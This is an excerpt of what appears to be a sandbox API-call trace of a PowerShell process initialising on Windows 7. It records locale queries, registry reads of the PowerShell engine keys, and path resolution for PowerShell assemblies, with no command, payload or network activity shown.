	[0248.959] GetWindowThreadProcessId (in: hWnd=0x1013a, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x568
	[0248.959] GetWindowThreadProcessId (in: hWnd=0x10132, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x538
	[0248.959] GetWindowThreadProcessId (in: hWnd=0x10128, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x540
	[0248.959] GetWindowThreadProcessId (in: hWnd=0x700a4, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x510
	[0248.959] GetWindowThreadProcessId (in: hWnd=0x20104, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x460
	[0248.959] GetWindowThreadProcessId (in: hWnd=0x2002a, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x79c
	[0248.959] GetWindowThreadProcessId (in: hWnd=0x1005a, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x4e0
	[0248.960] GetWindowThreadProcessId (in: hWnd=0x10048, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x460
	[0248.960] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x778
	[0248.962] WerSetFlags () returned 0x0
	[0248.968] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0248.968] CoTaskMemFree (pv=0x0) 
	[0248.969] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x16dee8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x16dee0 | out: pulNumLanguages=0x16dee8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x16dee0) returned 1
	[0248.969] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x16dee8, pwszLanguagesBuffer=0x2c5dee0, pcchLanguagesBuffer=0x16dee0 | out: pulNumLanguages=0x16dee8, pwszLanguagesBuffer=0x2c5dee0, pcchLanguagesBuffer=0x16dee0) returned 1
	[0248.974] CoTaskMemAlloc (cb=0x24) returned 0x2befa0
	[0248.974] GetUserDefaultLocaleName (in: lpLocaleName=0x2befa0, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0248.974] CoTaskMemFree (pv=0x2befa0) 
	[0248.994] CoTaskMemAlloc (cb=0x104) returned 0x2c9fb0
	[0248.994] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c9fb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0248.994] CoTaskMemFree (pv=0x2c9fb0) 
	[0249.448] CoTaskMemAlloc (cb=0x104) returned 0x2c9fb0
	[0249.448] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c9fb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0249.449] CoTaskMemFree (pv=0x2c9fb0) 
	[0249.450] CoTaskMemAlloc (cb=0x104) returned 0x2c9fb0
	[0249.450] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c9fb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0249.451] CoTaskMemFree (pv=0x2c9fb0) 
	[0249.458] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0249.458] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0249.458] SetErrorMode (uMode=0x1) returned 0x1
	[0249.458] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x16db60 | out: lpFileInformation=0x16db60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0249.459] SetErrorMode (uMode=0x1) returned 0x1
	[0249.459] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x16ddd0 | out: lpdwHandle=0x16ddd0) returned 0x94c
	[0249.460] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2c61770 | out: lpData=0x2c61770) returned 1
	[0249.461] VerQueryValueW (in: pBlock=0x2c61770, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x16dd48, puLen=0x16dd40 | out: lplpBuffer=0x16dd48*=0x2c6180c, puLen=0x16dd40) returned 1
	[0249.461] VerQueryValueW (in: pBlock=0x2c61770, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x16dcb8, puLen=0x16dcb0 | out: lplpBuffer=0x16dcb8*=0x2c618e8, puLen=0x16dcb0) returned 1
	[0249.461] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0249.461] CoTaskMemAlloc (cb=0x2e) returned 0x2c7be0
	[0249.461] lstrcpyW (in: lpString1=0x2c7be0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0249.461] CoTaskMemFree (pv=0x2c7be0) 
	[0249.461] VerQueryValueW (in: pBlock=0x2c61770, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x16dcb8, puLen=0x16dcb0 | out: lplpBuffer=0x16dcb8*=0x2c6193c, puLen=0x16dcb0) returned 1
	[0249.461] lstrlenW (lpString="System.Management.Automation") returned 28
	[0249.461] CoTaskMemAlloc (cb=0x3c) returned 0x2c89c0
	[0249.461] lstrcpyW (in: lpString1=0x2c89c0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0249.461] CoTaskMemFree (pv=0x2c89c0) 
	[0249.461] VerQueryValueW (in: pBlock=0x2c61770, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x16dcb8, puLen=0x16dcb0 | out: lplpBuffer=0x16dcb8*=0x2c61998, puLen=0x16dcb0) returned 1
	[0249.461] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0249.461] CoTaskMemAlloc (cb=0x20) returned 0x2c5ca0
	[0249.461] lstrcpyW (in: lpString1=0x2c5ca0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0249.461] CoTaskMemFree (pv=0x2c5ca0) 
	[0249.461] VerQueryValueW (in: pBlock=0x2c61770, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x16dcb8, puLen=0x16dcb0 | out: lplpBuffer=0x16dcb8*=0x2c619d8, puLen=0x16dcb0) returned 1
	[0249.461] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0249.461] CoTaskMemAlloc (cb=0x44) returned 0x2c89c0
	[0249.461] lstrcpyW (in: lpString1=0x2c89c0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0249.461] CoTaskMemFree (pv=0x2c89c0) 
	[0249.461] VerQueryValueW (in: pBlock=0x2c61770, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x16dcb8, puLen=0x16dcb0 | out: lplpBuffer=0x16dcb8*=0x2c61a40, puLen=0x16dcb0) returned 1
	[0249.461] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0249.461] CoTaskMemAlloc (cb=0x76) returned 0x260090
	[0249.461] lstrcpyW (in: lpString1=0x260090, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0249.461] CoTaskMemFree (pv=0x260090) 
	[0249.461] VerQueryValueW (in: pBlock=0x2c61770, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x16dcb8, puLen=0x16dcb0 | out: lplpBuffer=0x16dcb8*=0x2c61adc, puLen=0x16dcb0) returned 1
	[0249.461] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0249.461] CoTaskMemAlloc (cb=0x44) returned 0x2c89c0
	[0249.461] lstrcpyW (in: lpString1=0x2c89c0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0249.461] CoTaskMemFree (pv=0x2c89c0) 
	[0249.461] VerQueryValueW (in: pBlock=0x2c61770, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x16dcb8, puLen=0x16dcb0 | out: lplpBuffer=0x16dcb8*=0x2c61b40, puLen=0x16dcb0) returned 1
	[0249.461] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0249.461] CoTaskMemAlloc (cb=0x58) returned 0x2833e0
	[0249.461] lstrcpyW (in: lpString1=0x2833e0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0249.461] CoTaskMemFree (pv=0x2833e0) 
	[0249.461] VerQueryValueW (in: pBlock=0x2c61770, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x16dcb8, puLen=0x16dcb0 | out: lplpBuffer=0x16dcb8*=0x2c61bbc, puLen=0x16dcb0) returned 1
	[0249.461] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0249.462] CoTaskMemAlloc (cb=0x20) returned 0x2c5ca0
	[0249.462] lstrcpyW (in: lpString1=0x2c5ca0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0249.462] CoTaskMemFree (pv=0x2c5ca0) 
	[0249.462] VerQueryValueW (in: pBlock=0x2c61770, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x16dcb8, puLen=0x16dcb0 | out: lplpBuffer=0x16dcb8*=0x2c61864, puLen=0x16dcb0) returned 1
	[0249.462] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0249.462] CoTaskMemAlloc (cb=0x66) returned 0x2bb920
	[0249.462] lstrcpyW (in: lpString1=0x2bb920, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0249.462] CoTaskMemFree (pv=0x2bb920) 
	[0249.462] VerQueryValueW (in: pBlock=0x2c61770, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x16dcb8, puLen=0x16dcb0 | out: lplpBuffer=0x16dcb8*=0x0, puLen=0x16dcb0) returned 0
	[0249.462] VerQueryValueW (in: pBlock=0x2c61770, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x16dcb8, puLen=0x16dcb0 | out: lplpBuffer=0x16dcb8*=0x0, puLen=0x16dcb0) returned 0
	[0249.462] VerQueryValueW (in: pBlock=0x2c61770, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x16dcb8, puLen=0x16dcb0 | out: lplpBuffer=0x16dcb8*=0x0, puLen=0x16dcb0) returned 0
	[0249.462] VerQueryValueW (in: pBlock=0x2c61770, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x16dc88, puLen=0x16dc80 | out: lplpBuffer=0x16dc88*=0x2c6180c, puLen=0x16dc80) returned 1
	[0249.462] CoTaskMemAlloc (cb=0x204) returned 0x262650
	[0249.462] VerLanguageNameW (in: wLang=0x0, szLang=0x262650, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0249.462] CoTaskMemFree (pv=0x262650) 
	[0249.462] VerQueryValueW (in: pBlock=0x2c61770, lpSubBlock="\\", lplpBuffer=0x16dcd8, puLen=0x16dcd0 | out: lplpBuffer=0x16dcd8*=0x2c61798, puLen=0x16dcd0) returned 1
	[0249.468] CoTaskMemAlloc (cb=0x104) returned 0x2c9fb0
	[0249.468] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c9fb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0249.469] CoTaskMemFree (pv=0x2c9fb0) 
	[0249.472] CoTaskMemAlloc (cb=0x104) returned 0x2c9fb0
	[0249.472] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c9fb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0249.472] CoTaskMemFree (pv=0x2c9fb0) 
	[0249.476] lstrlenW (lpString="䅁") returned 1
	[0249.483] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16dba8 | out: phkResult=0x16dba8*=0x304) returned 0x0
	[0249.485] RegOpenKeyExW (in: hKey=0x304, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x16db98 | out: phkResult=0x16db98*=0x308) returned 0x0
	[0249.485] RegOpenKeyExW (in: hKey=0x308, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16dc28 | out: phkResult=0x16dc28*=0x30c) returned 0x0
	[0249.487] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16db6c, lpData=0x0, lpcbData=0x16db68*=0x0 | out: lpType=0x16db6c*=0x1, lpData=0x0, lpcbData=0x16db68*=0x56) returned 0x0
	[0249.488] CoTaskMemAlloc (cb=0x5a) returned 0x2bb8b0
	[0249.488] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16db3c, lpData=0x2bb8b0, lpcbData=0x16db38*=0x56 | out: lpType=0x16db3c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16db38*=0x56) returned 0x0
	[0249.488] CoTaskMemFree (pv=0x2bb8b0) 
	[0249.493] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0249.994] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0250.000] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0250.013] CoTaskMemAlloc (cb=0x104) returned 0x2c9fb0
	[0250.013] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c9fb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0250.013] CoTaskMemFree (pv=0x2c9fb0) 
	[0251.662] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x16d760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0251.662] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x16d760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0252.393] CoTaskMemAlloc (cb=0x104) returned 0x2ca0c0
	[0252.393] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ca0c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0252.393] CoTaskMemFree (pv=0x2ca0c0) 
	[0252.394] CoTaskMemAlloc (cb=0x104) returned 0x2ca0c0
	[0252.394] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ca0c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0252.394] CoTaskMemFree (pv=0x2ca0c0) 
	[0252.754] CoTaskMemAlloc (cb=0x104) returned 0x2ca0c0
	[0252.754] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ca0c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0252.754] CoTaskMemFree (pv=0x2ca0c0) 
	[0252.756] CoTaskMemAlloc (cb=0x104) returned 0x2ca0c0
	[0252.756] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ca0c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0252.756] CoTaskMemFree (pv=0x2ca0c0) 
	[0252.756] CoTaskMemAlloc (cb=0x104) returned 0x2ca0c0
	[0252.756] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ca0c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0252.756] CoTaskMemFree (pv=0x2ca0c0) 
	[0253.500] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x16d760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0253.500] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x16d760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0253.817] CoTaskMemAlloc (cb=0x104) returned 0x2ca0c0
	[0253.817] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ca0c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0253.817] CoTaskMemFree (pv=0x2ca0c0) 
	[0253.821] CoTaskMemAlloc (cb=0x104) returned 0x2ca0c0
	[0253.821] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ca0c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0253.821] CoTaskMemFree (pv=0x2ca0c0) 
	[0254.194] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0254.194] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0256.948] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x16d760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0256.948] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x16d760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0258.359] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0258.359] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0259.330] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x16d760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0259.330] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x16d760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0260.449] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x16d760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0260.450] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x16d760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0260.458] CoTaskMemAlloc (cb=0x104) returned 0x2ca2e0
	[0260.458] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ca2e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0260.458] CoTaskMemFree (pv=0x2ca2e0) 
	[0260.460] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d960, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0260.460] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0260.460] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0260.464] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0260.815] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x16d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0260.815] SetErrorMode (uMode=0x1) returned 0x1
	[0260.815] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x16db00 | out: lpFileInformation=0x16db00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0260.816] SetErrorMode (uMode=0x1) returned 0x1
	[0262.058] CoTaskMemAlloc (cb=0x104) returned 0x2ca2e0
